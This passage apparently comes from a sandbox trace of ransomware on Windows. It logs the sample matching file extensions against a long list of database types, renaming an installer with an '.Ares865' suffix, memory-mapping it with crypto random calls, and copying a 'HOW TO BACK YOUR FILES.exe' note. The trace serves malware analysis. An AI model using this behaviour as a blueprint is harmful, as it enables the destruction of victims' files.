(lpString1="msi", lpString2="db3") returned 1 [0074.461] lstrlenW (lpString="dbf") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0074.461] lstrlenW (lpString="mdf") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0074.461] lstrlenW (lpString="mdb") returned 3 [0074.461] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0074.461] lstrlenW (lpString="sql") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0074.462] lstrlenW (lpString="sqlite") returned 6 [0074.462] lstrcmpiW (lpString1="86.msi", lpString2="sqlite") returned -1 [0074.462] lstrlenW (lpString="sqlite3") returned 7 [0074.462] lstrcmpiW (lpString1="x86.msi", lpString2="sqlite3") returned 1 [0074.462] lstrlenW (lpString="sqlitedb") returned 8 [0074.462] lstrcmpiW (lpString1="_x86.msi", lpString2="sqlitedb") returned -1 [0074.462] lstrlenW (lpString="xml") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0074.462] lstrlenW (lpString="$er") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0074.462] lstrlenW (lpString="4dd") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0074.462] lstrlenW (lpString="4dl") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0074.462] lstrlenW (lpString="^^^") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0074.462] lstrlenW (lpString="abs") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0074.462] lstrlenW (lpString="abx") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0074.462] lstrlenW (lpString="accdb") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accdb") returned -1 [0074.462] lstrlenW (lpString="accdc") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accdc") returned -1 [0074.462] lstrlenW (lpString="accde") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accde") returned -1 [0074.462] lstrlenW (lpString="accdr") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accdr") returned -1 [0074.462] lstrlenW (lpString="accdt") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accdt") returned -1 [0074.462] lstrlenW (lpString="accdw") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accdw") returned -1 [0074.462] lstrlenW (lpString="accft") returned 5 [0074.462] lstrcmpiW (lpString1="6.msi", lpString2="accft") returned -1 [0074.462] lstrlenW (lpString="adb") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0074.462] lstrlenW (lpString="adb") returned 3 [0074.462] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0074.463] lstrlenW (lpString="ade") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0074.463] lstrlenW (lpString="adf") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0074.463] lstrlenW (lpString="adn") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0074.463] lstrlenW (lpString="adp") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0074.463] lstrlenW (lpString="alf") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0074.463] lstrlenW (lpString="ask") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0074.463] lstrlenW (lpString="btr") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0074.463] lstrlenW (lpString="cat") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0074.463] lstrlenW (lpString="cdb") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0074.463] lstrlenW (lpString="ckp") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0074.463] lstrlenW (lpString="cma") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0074.463] lstrlenW (lpString="cpd") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0074.463] lstrlenW (lpString="dacpac") returned 6 [0074.463] lstrcmpiW (lpString1="86.msi", lpString2="dacpac") returned -1 [0074.463] lstrlenW (lpString="dad") returned 3 [0074.463] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0074.463] lstrlenW (lpString="dadiagrams") returned 10 [0074.463] lstrcmpiW (lpString1="um_x86.msi", lpString2="dadiagrams") returned 1 [0074.463] lstrlenW (lpString="daschema") returned 8 [0074.463] lstrcmpiW (lpString1="_x86.msi", lpString2="daschema") returned -1 [0074.463] lstrlenW (lpString="db-journal") returned 10 [0074.463] lstrcmpiW (lpString1="um_x86.msi", lpString2="db-journal") returned 1 [0074.463] lstrlenW (lpString="db-shm") returned 6 [0074.463] lstrcmpiW (lpString1="86.msi", lpString2="db-shm") returned -1 [0074.463] lstrlenW (lpString="db-wal") returned 6 [0074.464] lstrcmpiW (lpString1="86.msi", lpString2="db-wal") returned -1 [0074.464] lstrlenW (lpString="dbc") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0074.464] lstrlenW (lpString="dbs") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0074.464] lstrlenW (lpString="dbt") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0074.464] lstrlenW (lpString="dbv") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0074.464] lstrlenW (lpString="dbx") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0074.464] lstrlenW (lpString="dcb") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0074.464] lstrlenW (lpString="dct") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0074.464] lstrlenW (lpString="dcx") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0074.464] lstrlenW (lpString="ddl") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0074.464] lstrlenW (lpString="dlis") returned 4 [0074.464] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0074.464] lstrlenW (lpString="dp1") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0074.464] lstrlenW (lpString="dqy") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0074.464] lstrlenW (lpString="dsk") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0074.464] lstrlenW (lpString="dsn") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0074.464] lstrlenW (lpString="dtsx") returned 4 [0074.464] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0074.464] lstrlenW (lpString="dxl") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0074.464] lstrlenW (lpString="eco") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0074.464] lstrlenW (lpString="ecx") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0074.464] lstrlenW (lpString="edb") returned 3 [0074.464] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0074.465] lstrlenW (lpString="epim") returned 4 [0074.465] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0074.465] lstrlenW (lpString="fcd") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0074.465] lstrlenW (lpString="fdb") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0074.465] lstrlenW (lpString="fic") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0074.465] lstrlenW (lpString="flexolibrary") returned 12 [0074.465] lstrcmpiW (lpString1="imum_x86.msi", lpString2="flexolibrary") returned 1 [0074.465] lstrlenW (lpString="fm5") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0074.465] lstrlenW (lpString="fmp") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0074.465] lstrlenW (lpString="fmp12") returned 5 [0074.465] lstrcmpiW (lpString1="6.msi", lpString2="fmp12") returned -1 [0074.465] lstrlenW (lpString="fmpsl") returned 5 [0074.465] lstrcmpiW (lpString1="6.msi", lpString2="fmpsl") returned -1 [0074.465] lstrlenW (lpString="fol") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0074.465] lstrlenW (lpString="fp3") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0074.465] lstrlenW (lpString="fp4") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0074.465] lstrlenW (lpString="fp5") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0074.465] lstrlenW (lpString="fp7") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0074.465] lstrlenW (lpString="fpt") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0074.465] lstrlenW (lpString="frm") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0074.465] lstrlenW (lpString="gdb") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0074.465] lstrlenW (lpString="gdb") returned 3 [0074.465] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0074.465] lstrlenW (lpString="grdb") returned 4 [0074.465] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0074.466] lstrlenW (lpString="gwi") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0074.466] lstrlenW (lpString="hdb") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0074.466] lstrlenW (lpString="his") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0074.466] lstrlenW (lpString="ib") returned 2 [0074.466] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0074.466] lstrlenW (lpString="idb") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0074.466] lstrlenW (lpString="ihx") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0074.466] lstrlenW (lpString="itdb") returned 4 [0074.466] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0074.466] lstrlenW (lpString="itw") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0074.466] lstrlenW (lpString="jet") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0074.466] lstrlenW (lpString="jtx") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0074.466] lstrlenW (lpString="kdb") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0074.466] lstrlenW (lpString="kexi") returned 4 [0074.466] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0074.466] lstrlenW (lpString="kexic") returned 5 [0074.466] lstrcmpiW (lpString1="6.msi", lpString2="kexic") returned -1 [0074.466] lstrlenW (lpString="kexis") returned 5 [0074.466] lstrcmpiW (lpString1="6.msi", lpString2="kexis") returned -1 [0074.466] lstrlenW (lpString="lgc") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0074.466] lstrlenW (lpString="lwx") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0074.466] lstrlenW (lpString="maf") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0074.466] lstrlenW (lpString="maq") returned 3 [0074.466] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0074.466] lstrlenW (lpString="mar") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0074.467] lstrlenW (lpString="marshal") returned 7 [0074.467] lstrcmpiW (lpString1="x86.msi", lpString2="marshal") returned 1 [0074.467] lstrlenW (lpString="mas") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0074.467] lstrlenW (lpString="mav") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0074.467] lstrlenW (lpString="maw") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0074.467] lstrlenW (lpString="mdbhtml") returned 7 [0074.467] lstrcmpiW (lpString1="x86.msi", lpString2="mdbhtml") returned 1 [0074.467] lstrlenW (lpString="mdn") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0074.467] lstrlenW (lpString="mdt") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0074.467] lstrlenW (lpString="mfd") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0074.467] lstrlenW (lpString="mpd") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0074.467] lstrlenW (lpString="mrg") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0074.467] lstrlenW (lpString="mud") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0074.467] lstrlenW (lpString="mwb") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0074.467] lstrlenW (lpString="myd") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0074.467] lstrlenW (lpString="ndf") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0074.467] lstrlenW (lpString="nnt") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0074.467] lstrlenW (lpString="nrmlib") returned 6 [0074.467] lstrcmpiW (lpString1="86.msi", lpString2="nrmlib") returned -1 [0074.467] lstrlenW (lpString="ns2") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0074.467] lstrlenW (lpString="ns3") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0074.467] lstrlenW (lpString="ns4") returned 3 [0074.467] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0074.468] lstrlenW (lpString="nsf") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0074.468] lstrlenW (lpString="nv") returned 2 [0074.468] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0074.468] lstrlenW (lpString="nv2") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0074.468] lstrlenW (lpString="nwdb") returned 4 [0074.468] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0074.468] lstrlenW (lpString="nyf") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0074.468] lstrlenW (lpString="odb") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0074.468] lstrlenW (lpString="odb") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0074.468] lstrlenW (lpString="oqy") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0074.468] lstrlenW (lpString="ora") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0074.468] lstrlenW (lpString="orx") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0074.468] lstrlenW (lpString="owc") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0074.468] lstrlenW (lpString="p96") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0074.468] lstrlenW (lpString="p97") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0074.468] lstrlenW (lpString="pan") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0074.468] lstrlenW (lpString="pdb") returned 3 [0074.468] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0074.469] lstrlenW (lpString="pdm") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0074.469] lstrlenW (lpString="pnz") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0074.469] lstrlenW (lpString="qry") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0074.469] lstrlenW (lpString="qvd") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0074.469] lstrlenW (lpString="rbf") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0074.469] lstrlenW (lpString="rctd") returned 4 [0074.469] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0074.469] lstrlenW (lpString="rod") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0074.469] lstrlenW (lpString="rodx") returned 4 [0074.469] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0074.469] lstrlenW (lpString="rpd") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0074.469] lstrlenW (lpString="rsd") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0074.469] lstrlenW (lpString="sas7bdat") returned 8 [0074.469] lstrcmpiW (lpString1="_x86.msi", lpString2="sas7bdat") returned -1 [0074.469] lstrlenW (lpString="sbf") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0074.469] lstrlenW (lpString="scx") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0074.469] lstrlenW (lpString="sdb") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0074.469] lstrlenW (lpString="sdc") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0074.469] lstrlenW (lpString="sdf") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0074.469] lstrlenW (lpString="sis") returned 3 [0074.469] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0074.470] lstrlenW (lpString="spq") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0074.470] lstrlenW (lpString="te") returned 2 [0074.470] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0074.470] lstrlenW (lpString="teacher") returned 7 [0074.470] lstrcmpiW (lpString1="x86.msi", lpString2="teacher") returned 1 [0074.470] lstrlenW (lpString="tmd") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0074.470] lstrlenW (lpString="tps") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0074.470] lstrlenW (lpString="trc") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0074.470] lstrlenW (lpString="trc") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0074.470] lstrlenW (lpString="trm") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0074.470] lstrlenW (lpString="udb") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0074.470] lstrlenW (lpString="udl") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0074.470] lstrlenW (lpString="usr") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0074.470] lstrlenW (lpString="v12") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0074.470] lstrlenW (lpString="vis") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0074.470] lstrlenW (lpString="vpd") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0074.470] lstrlenW (lpString="vvv") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0074.470] lstrlenW (lpString="wdb") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0074.470] lstrlenW (lpString="wmdb") returned 4 [0074.470] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0074.470] lstrlenW (lpString="wrk") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0074.470] lstrlenW (lpString="xdb") returned 3 [0074.470] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0074.470] lstrlenW (lpString="xld") returned 3 [0074.471] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0074.471] lstrlenW (lpString="xmlff") returned 5 [0074.471] lstrcmpiW (lpString1="6.msi", lpString2="xmlff") returned -1 [0074.471] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865") returned 146 [0074.471] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.ares865"), dwFlags=0x1) returned 1 [0074.472] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=151552) returned 1 [0074.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0074.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0074.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0074.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0074.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.473] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25300, lpName=0x0) returned 0x120 [0074.475] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25300) returned 0x420000 [0074.486] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0074.487] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0074.487] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0074.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0074.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0074.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0074.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0074.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0074.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0074.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0074.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0074.488] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0074.489] CloseHandle (hObject=0x120) returned 1 [0074.489] CloseHandle (hObject=0x118) returned 1 [0074.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0074.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0074.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0074.490] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0074.490] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.490] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0074.490] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0074.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2be0 | out: hHeap=0x2b0000) returned 1 [0074.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0074.490] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 82 [0074.490] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0074.490] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.491] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.491] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, 